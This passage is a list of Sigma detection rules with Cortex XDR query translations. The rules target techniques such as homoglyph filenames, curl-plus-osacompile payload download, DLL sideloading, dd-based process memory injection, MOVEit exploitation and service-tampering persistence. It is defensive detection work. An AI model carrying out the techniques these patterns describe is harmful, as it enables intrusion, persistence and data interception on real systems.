            - "\u0395" # Ε/E
            - "\u0396" # Ζ/Z
            - "\u0397" # Η/H
            - "\u0399" # Ι/I
            - "\u039a" # Κ/K
            - "\u039c" # Μ/M
            - "\u039d" # Ν/N
            - "\u039f" # Ο/O
            - "\u03a1" # Ρ/P
            - "\u03a4" # Τ/T
            - "\u03a5" # Υ/Y
            - "\u03a7" # Χ/X
    selection_lower:
        CommandLine|contains:
            - "\u0430" # а/a
            - "\u0435" # е/e
            - "\u043e" # о/o
            - "\u0440" # р/p
            - "\u0441" # с/c
            - "\u0445" # х/x
            - "\u0455" # ѕ/s
            - "\u0456" # і/i
            - "\u04cf" # ӏ/l
            - "\u0458" # ј/j
            - "\u04bb" # һ/h
            - "\u0501" # ԁ/d
            - "\u051b" # ԛ/q
            - "\u051d" # ԝ/w
            - "\u03bf" # ο/o
    condition: 1 of selection_*
falsepositives:
    - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
level: medium
medium Moderate High FP
Potential Homoglyph Attack Using Lookalike Characters in Filename
Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attacks.
status test author Micah Babinski, @micahbabinski ATT&CK sub-technique id 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6
cortex_xdr query
config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_file_name in ("*А*", "*В*", "*Е*", "*К*", "*М*", "*Н*", "*О*", "*Р*", "*С*", "*Т*", "*Х*", "*Ѕ*", "*І*", "*Ј*", "*Ү*", "*Ӏ*", "*Ԍ*", "*Ԛ*", "*Ԝ*", "*Α*", "*Β*", "*Ε*", "*Ζ*", "*Η*", "*Ι*", "*Κ*", "*Μ*", "*Ν*", "*Ο*", "*Ρ*", "*Τ*", "*Υ*", "*Χ*")) or 
 (action_file_name in ("*а*", "*е*", "*о*", "*р*", "*с*", "*х*", "*ѕ*", "*і*", "*ӏ*", "*ј*", "*һ*", "*ԁ*", "*ԛ*", "*ԝ*", "*ο*"))))
view Sigma YAML
title: Potential Homoglyph Attack Using Lookalike Characters in Filename
id: 4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6
status: test
description: |
    Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
    This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that
    are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
references:
    - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish
    - http://www.irongeek.com/homoglyph-attack-generator.php
author: Micah Babinski, @micahbabinski
date: 2023-05-08
tags:
    - attack.stealth
    - attack.t1036
    - attack.t1036.003
logsource:
    category: file_event
    product: windows
detection:
    selection_upper:
        TargetFilename|contains:
            - "\u0410" # А/A
            - "\u0412" # В/B
            - "\u0415" # Е/E
            - "\u041a" # К/K
            - "\u041c" # М/M
            - "\u041d" # Н/H
            - "\u041e" # О/O
            - "\u0420" # Р/P
            - "\u0421" # С/C
            - "\u0422" # Т/T
            - "\u0425" # Х/X
            - "\u0405" # Ѕ/S
            - "\u0406" # І/I
            - "\u0408" # Ј/J
            - "\u04ae" # Ү/Y
            - "\u04c0" # Ӏ/I
            - "\u050C" # Ԍ/G
            - "\u051a" # Ԛ/Q
            - "\u051c" # Ԝ/W
            - "\u0391" # Α/A
            - "\u0392" # Β/B
            - "\u0395" # Ε/E
            - "\u0396" # Ζ/Z
            - "\u0397" # Η/H
            - "\u0399" # Ι/I
            - "\u039a" # Κ/K
            - "\u039c" # Μ/M
            - "\u039d" # Ν/N
            - "\u039f" # Ο/O
            - "\u03a1" # Ρ/P
            - "\u03a4" # Τ/T
            - "\u03a5" # Υ/Y
            - "\u03a7" # Χ/X
    selection_lower:
        TargetFilename|contains:
            - "\u0430" # а/a
            - "\u0435" # е/e
            - "\u043e" # о/o
            - "\u0440" # р/p
            - "\u0441" # с/c
            - "\u0445" # х/x
            - "\u0455" # ѕ/s
            - "\u0456" # і/i
            - "\u04cf" # ӏ/l
            - "\u0458" # ј/j
            - "\u04bb" # һ/h
            - "\u0501" # ԁ/d
            - "\u051b" # ԛ/q
            - "\u051d" # ԝ/w
            - "\u03bf" # ο/o
    condition: 1 of selection_*
falsepositives:
    - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
level: medium
medium Moderate High FP
Potential In-Memory Download And Compile Of Payloads
Detects potential in-memory downloading and compiling of applets using curl and osacompile, as observed in XCSSET malware
status test author Sohan G (D4rkCiph3r), Red Canary (idea) ATT&CK sub-technique id 13db8d2e-7723-4c2c-93c1-a4d36994f7ef
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_MAC and 
 (action_process_image_command_line contains "osacompile" and 
 action_process_image_command_line contains "curl"))
view Sigma YAML
title: Potential In-Memory Download And Compile Of Payloads
id: 13db8d2e-7723-4c2c-93c1-a4d36994f7ef
status: test
description: Detects potential in-memory downloading and compiling of applets using curl and osacompile, as observed in XCSSET malware
references:
    - https://redcanary.com/blog/mac-application-bundles/
author: Sohan G (D4rkCiph3r), Red Canary (idea)
date: 2023-08-22
tags:
    - attack.command-and-control
    - attack.execution
    - attack.t1059.007
    - attack.t1105
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        CommandLine|contains|all:
            - 'osacompile'
            - 'curl'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Potential Initial Access via DLL Search Order Hijacking
Detects attempts to create a DLL file in a known desktop application dependency folder (such as Slack, Teams or OneDrive) by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
status test author Tim Rauch (rule), Elastic (idea) ATT&CK sub-technique id dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c
cortex_xdr query
config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((actor_process_image_path in ("*\winword.exe", "*\excel.exe", "*\powerpnt.exe", "*\MSACCESS.EXE", "*\MSPUB.EXE", "*\fltldr.exe", "*\cmd.exe", "*\certutil.exe", "*\mshta.exe", "*\cscript.exe", "*\wscript.exe", "*\curl.exe", "*\powershell.exe", "*\pwsh.exe")) and 
 action_file_name contains ".dll" and 
 (action_file_name contains "\Users\" and 
 action_file_name contains "\AppData\") and 
 (action_file_name in ("*\Microsoft\OneDrive\*", "*\Microsoft OneDrive\*", "*\Microsoft\Teams\*", "*\Local\slack\app-*", "*\Local\Programs\Microsoft VS Code\*"))) and 
 (not 
 (actor_process_image_path contains "\cmd.exe" and 
 (action_file_name contains "\Users\" and 
 action_file_name contains "\AppData\" and 
 action_file_name contains "\Microsoft\OneDrive\" and 
 action_file_name contains "\api-ms-win-core-")))))
view Sigma YAML
title: Potential Initial Access via DLL Search Order Hijacking
id: dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c
status: test
description: Detects attempts to create a DLL file in a known desktop application dependency folder (such as Slack, Teams or OneDrive) by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc
    - https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-21
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1566
    - attack.t1566.001
    - attack.initial-access
    - attack.t1574
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # add more processes when you find them
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\MSACCESS.EXE'
            - '\MSPUB.EXE'
            - '\fltldr.exe'
            - '\cmd.exe'
            - '\certutil.exe'
            - '\mshta.exe'
            - '\cscript.exe'
            - '\wscript.exe'
            - '\curl.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
        TargetFilename|endswith: '.dll'
        TargetFilename|contains|all:
            - '\Users\'
            - '\AppData\'
        TargetFilename|contains:
            # add more suspicious paths when you find them
            - '\Microsoft\OneDrive\'
            - '\Microsoft OneDrive\'
            - '\Microsoft\Teams\'
            - '\Local\slack\app-'
            - '\Local\Programs\Microsoft VS Code\'
    filter:
        Image|endswith: '\cmd.exe'
        TargetFilename|contains|all:
            - '\Users\'
            - '\AppData\'
            - '\Microsoft\OneDrive\'
            - '\api-ms-win-core-'
    condition: selection and not filter
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential KamiKakaBot Activity - Lure Document Execution
Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
status test author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) ATT&CK technique id 24474469-bd80-46cc-9e08-9fbe81bfaaca
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_process_image_path contains "\cmd.exe" and 
 (action_process_image_command_line contains "/c " and 
 action_process_image_command_line contains ".lnk ~" and 
 action_process_image_command_line contains "Start Menu\Programs\Word") and 
 action_process_image_command_line contains ".doc"))
view Sigma YAML
title: Potential KamiKakaBot Activity - Lure Document Execution
id: 24474469-bd80-46cc-9e08-9fbe81bfaaca
status: test
description: |
    Detects the execution of a Word document via the WinWord Start Menu shortcut.
    This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
references:
    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-03-22
tags:
    - attack.execution
    - attack.t1059
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - '/c '
            - '.lnk ~'
            - 'Start Menu\Programs\Word'
        CommandLine|endswith: '.doc'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
status test author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) ATT&CK tactic-only id fe9e8ba9-4419-41e6-a574-bd9f7b3af961
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\schtasks.exe" and 
 (action_process_image_command_line contains " /create " and 
 action_process_image_command_line contains "shutdown /l /f" and 
 action_process_image_command_line contains "WEEKLY")) and 
 (not 
 (action_process_username in ("*AUTHORI*", "*AUTORI*")))))
view Sigma YAML
title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
id: fe9e8ba9-4419-41e6-a574-bd9f7b3af961
status: test
description: |
    Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command.
    This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
references:
    - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
    - https://tria.ge/240123-rapteaahhr/behavioral1
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-03-22
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:
            - ' /create '
            - 'shutdown /l /f'
            - 'WEEKLY'
    filter_main_system_user:
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Potential Lateral Movement via Windows Remote Shell
Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
status experimental author Liran Ravich ATT&CK sub-technique id 79df3f68-dccb-48e9-9171-b75cbc37c51d
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\winrshost.exe" and 
 (not 
 action_process_image_path = "C:\Windows\System32\conhost.exe")))
view Sigma YAML
title: Potential Lateral Movement via Windows Remote Shell
id: 79df3f68-dccb-48e9-9171-b75cbc37c51d
status: experimental
description: |
    Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
references:
    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/
    - https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement
author: Liran Ravich
date: 2025-10-22
tags:
    - attack.lateral-movement
    - attack.t1021.006
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Note: Example of command to simulate (winrm needs to be enabled): "c:\Windows\System32\winrs.exe" powershell
        ParentImage|endswith: '\winrshost.exe'
    filter_main_conhost:
        Image: 'C:\Windows\System32\conhost.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate use of WinRM within the organization
level: medium
medium Moderate High FP
Potential Libvlc.DLL Sideloading
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
status test author X__Junior ATT&CK sub-technique id bf9808c4-d24f-44a2-8398-b65227d406b6
cortex_xdr query
config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\libvlc.dll" and 
 (not 
 (action_module_path in ("C:\Program Files (x86)\VideoLAN\VLC\*", "C:\Program Files\VideoLAN\VLC\*")))))
view Sigma YAML
title: Potential Libvlc.DLL Sideloading
id: bf9808c4-d24f-44a2-8398-b65227d406b6
status: test
description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
references:
    - https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html
    - https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html
author: X__Junior
date: 2023-04-17
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\libvlc.dll'
    filter_main_vlc:
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\VideoLAN\VLC\'
            - 'C:\Program Files\VideoLAN\VLC\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - False positives are expected if VLC is installed in non-default locations
level: medium
medium Strong High FP
Potential Linux Amazon SSM Agent Hijacking
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
status test author Muhammad Faisal ATT&CK sub-technique id f9b3edc5-3322-4fc7-8aa3-245d646cc4b7
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/amazon-ssm-agent" and 
 (action_process_image_command_line contains "-register " and 
 action_process_image_command_line contains "-code " and 
 action_process_image_command_line contains "-id " and 
 action_process_image_command_line contains "-region ")))
view Sigma YAML
title: Potential Linux Amazon SSM Agent Hijacking
id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7
status: test
description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
references:
    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/
    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
author: Muhammad Faisal
date: 2023-08-03
tags:
    - attack.command-and-control
    - attack.persistence
    - attack.t1219.002
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/amazon-ssm-agent'
        CommandLine|contains|all:
            - '-register '
            - '-code '
            - '-id '
            - '-region '
    condition: selection
falsepositives:
    - Legitimate activity of system administrators
level: medium
medium Moderate High FP
Potential Linux Process Code Injection Via DD Utility
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
status test author Joseph Kamau ATT&CK sub-technique id 4cad6c64-d6df-42d6-8dae-eb78defdc415
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_LINUX and 
 (action_process_image_path contains "/dd" and 
 (action_process_image_command_line contains "of=" and 
 action_process_image_command_line contains "/proc/" and 
 action_process_image_command_line contains "/mem")))
view Sigma YAML
title: Potential Linux Process Code Injection Via DD Utility
id: 4cad6c64-d6df-42d6-8dae-eb78defdc415
status: test
description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
references:
    - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/
    - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh
author: Joseph Kamau
date: 2023-12-01
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.009
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/dd'
        CommandLine|contains|all:
            - 'of='
            - '/proc/'
            - '/mem'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate High FP
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit-affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting opportunity: events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated.
status test author @kostastsale ATT&CK technique id 39ac1fb0-07f1-474b-b97e-c5c0eace0d79
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (actor_process_image_path contains "\w3wp.exe" and 
 actor_process_command_line contains "moveitdmz pool" and 
 action_process_image_path contains "\csc.exe"))
view Sigma YAML
title: Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
id: 39ac1fb0-07f1-474b-b97e-c5c0eace0d79
status: test
description: |
    Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit-affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.

    MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll.

    Hunting Opportunity

    Events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated.
references:
    - https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
    - https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/
author: '@kostastsale'
date: 2023-06-01
tags:
    - attack.execution
    - attack.t1059
    - cve.2023-34362
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\w3wp.exe'
        ParentCommandLine|contains: 'moveitdmz pool'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Initial software installation and software updates.
level: medium
medium Moderate High FP
Potential Mfdetours.DLL Sideloading
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id d2605a99-2218-4894-8fd3-2afb7946514d
cortex_xdr query
config case_sensitive = false | preset=xdr_image_load | filter event_type = ENUM.LOAD_IMAGE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_module_path contains "\mfdetours.dll" and 
 (not 
 action_module_path contains ":\Program Files (x86)\Windows Kits\10\bin\")))
view Sigma YAML
title: Potential Mfdetours.DLL Sideloading
id: d2605a99-2218-4894-8fd3-2afb7946514d
status: test
description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-03
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\mfdetours.dll'
    filter_main_legit_path:
        ImageLoaded|contains: ':\Program Files (x86)\Windows Kits\10\bin\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: medium
medium Moderate High FP
Potential Mftrace.EXE Abuse
Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 actor_process_image_path contains "\mftrace.exe")
view Sigma YAML
title: Potential Mftrace.EXE Abuse
id: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e
status: test
description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-09
modified: 2023-08-03
tags:
    - attack.execution
    - attack.stealth
    - attack.t1127
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\mftrace.exe'
    condition: selection
falsepositives:
    - Legitimate use for tracing purposes
level: medium
medium Strong Medium FP
Potential Network Sniffing Activity Using Network Tools
Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
status test author Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id ba1f7802-adc7-48b4-9ecb-81e227fddfd5
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 ((action_process_image_path contains "\tshark.exe" and 
 action_process_image_command_line contains "-i") or 
 action_process_image_path contains "\windump.exe"))
view Sigma YAML
title: Potential Network Sniffing Activity Using Network Tools
id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5
status: test
description: |
    Detects potential network sniffing via use of network tools such as "tshark", "windump".
    Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
    An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-21
modified: 2023-02-20
tags:
    - attack.credential-access
    - attack.discovery
    - attack.t1040
logsource:
    category: process_creation
    product: windows
detection:
    selection_tshark:
        Image|endswith: '\tshark.exe'
        CommandLine|contains: '-i'
    selection_windump:
        Image|endswith: '\windump.exe'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration activity to troubleshoot network issues
level: medium
medium Strong Medium FP
Potential PendingFileRenameOperations Tampering
Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.
status test author frack113 ATT&CK sub-technique id 4eec988f-7bf0-49f1-8675-1e6a510b3a2a
cortex_xdr query
config case_sensitive = false | preset=xdr_registry | filter (event_type = ENUM.REGISTRY and 
 event_sub_type = ENUM.REGISTRY_SET_VALUE) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (action_registry_key_name contains "\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations" and 
 (actor_process_image_path contains "\Users\Public\" or 
 (actor_process_image_path in ("*\reg.exe", "*\regedit.exe")))))
view Sigma YAML
title: Potential PendingFileRenameOperations Tampering
id: 4eec988f-7bf0-49f1-8675-1e6a510b3a2a
status: test
description: |
    Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.
references:
    - https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6
    - https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN
    - https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html
    - https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
author: frack113
date: 2023-01-27
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1036.003
logsource:
    category: registry_set
    product: windows
detection:
    selection_main:
        TargetObject|contains: '\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations'
    selection_susp_paths:
        Image|contains: '\Users\Public\'
            # - '\AppData\Local\Temp\'  # Commented out as it's used by legitimate installers
    selection_susp_images:
        Image|endswith:
            - '\reg.exe'
            - '\regedit.exe'
    condition: selection_main and 1 of selection_susp_*
falsepositives:
    - Installers and updaters may set currently in use files for rename or deletion after a reboot.
level: medium
medium Moderate High FP
Potential Persistence Attempt Via ErrorHandler.Cmd
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 15904280-565c-4b73-9303-3291f964e7f9
cortex_xdr query
config case_sensitive = false | preset=xdr_file | filter event_type = ENUM.FILE and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 action_file_name contains "\WINDOWS\Setup\Scripts\ErrorHandler.cmd")
Sigma YAML
title: Potential Persistence Attempt Via ErrorHandler.Cmd
id: 15904280-565c-4b73-9303-3291f964e7f9
status: test
description: |
    Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
    The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
references:
    - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
    - https://github.com/last-byte/PersistenceSniper
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-09
modified: 2022-12-19
tags:
    - attack.persistence
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\WINDOWS\Setup\Scripts\ErrorHandler.cmd'
    condition: selection
falsepositives:
    - Unknown
level: medium
level: medium · quality: Moderate · alert volume: High FP
Potential Persistence Attempt Via Existing Service Tampering
Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed, as a potential method for persistence.
status: test · author: Sreeman · ATT&CK mapping: sub-technique · id: 38879043-7e1e-47a9-8d46-6bec88e201df
cortex_xdr query
config case_sensitive = false | preset=xdr_process | filter (event_type = ENUM.PROCESS and 
 event_sub_type = ENUM.PROCESS_START) and 
 (agent_os_type = ENUM.AGENT_OS_WINDOWS and 
 (((action_process_image_command_line contains "sc " and 
 action_process_image_command_line contains "config " and 
 action_process_image_command_line contains "binpath=") or 
 (action_process_image_command_line contains "sc " and 
 action_process_image_command_line contains "failure" and 
 action_process_image_command_line contains "command=")) or 
 (((action_process_image_command_line contains "reg " and 
 action_process_image_command_line contains "add " and 
 action_process_image_command_line contains "FailureCommand") or 
 (action_process_image_command_line contains "reg " and 
 action_process_image_command_line contains "add " and 
 action_process_image_command_line contains "ImagePath")) and 
 (action_process_image_command_line in ("*.sh*", "*.exe*", "*.dll*", "*.bin$*", "*.bat*", "*.cmd*", "*.js*", "*.msh$*", "*.reg$*", "*.scr*", "*.ps*", "*.vb*", "*.jar*", "*.pl*")))))
